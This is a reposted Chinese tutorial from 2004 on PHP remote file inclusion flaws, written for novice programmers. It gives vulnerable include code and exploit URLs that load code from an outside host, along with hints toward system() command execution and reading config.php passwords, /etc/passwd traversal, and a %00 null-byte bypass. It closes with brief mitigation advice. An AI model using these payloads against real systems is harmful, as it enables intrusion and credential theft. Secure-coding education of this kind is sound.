php远程文件包含攻击,php远程文件包含漏洞

Author:Zizzy

两年前的文章了,估计适合对php包含漏洞一知半解的

2004-3-7

在这篇文章里我会告诉php远程文件包含漏洞的原理,初涉程序员的人必看。

首先的问题是,什么才是”远程文件包含漏洞“?简要的回答是服务器通过php的任意文件包含过滤不严,从而去执行一个恶意文件,这是个程序员过滤上的问题,请记住,所有的cgi程序都有这样的bug。

1.找出bug:

为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的文件。在php里,我们使用include()函数,它的工作流程:

如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。

我们先看这个,当用户输入通过后就包含文件,也就是

CODE:

if ($_GET[page]) {

include $_GET[page];

} else {

include "home.php";

}

这种结构在动态网站里是常见的,问题是它允许这样

http://www.target.com/explame.php?page=main.php

或者

http://www.target.com/explame.php?page=downloads.php

来查看。无论如何,如果你的程序里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,文件包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程序员依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。

2.测试

这里有个远程文件包含的例子,目的只有一个,为了你的程序安全,我们来看具体的

http://www.target.com/explame.php?page=zizzy

Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3

Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3

php输出的这些错误信息告诉我们,程序去包含文件/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的文件,现在理解了吧。

3.利用

php确实很好,可以远程调用文件,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt内容这样

echo "Wow,test!";

?>

那么

http://www.target.com/explame.php?page=http://www.mysite.com/yeah.txt

OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成 phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../../../../etc/passwd。知道什么叫真正的包含了吧。

4.另一种

有时程序员换种写法,写成这样,限制了包含范围

if ($_GET[page]) {

include "$_GET[page].php";

} else {

include "home.php";

}

我们提交

http://www.target.com/explame.php?page=http://www.mysite.com/yeah.txt

Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3

Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3

包含失败了,限制了后缀名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了

那passwd怎么办

Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3

Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/explame.php on line 3

在这里使用个NUL字符,也就是%00来跳过检测

http://www.target.com/explame.php?page=../../../../../../../etc/passwd%00

看见了吧。

5.建议

包含文件时最好指定好包含哪一个文件,或者过滤好提交的的变量,这也就是这篇文章的目的,不是写给hacking的人看,而是写给那些初涉程序员的人,这样的文章网上很多,只要有人受益,也就达到目的了。

那个是jsp的包含

4种写法

pageContext.include("变量")

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值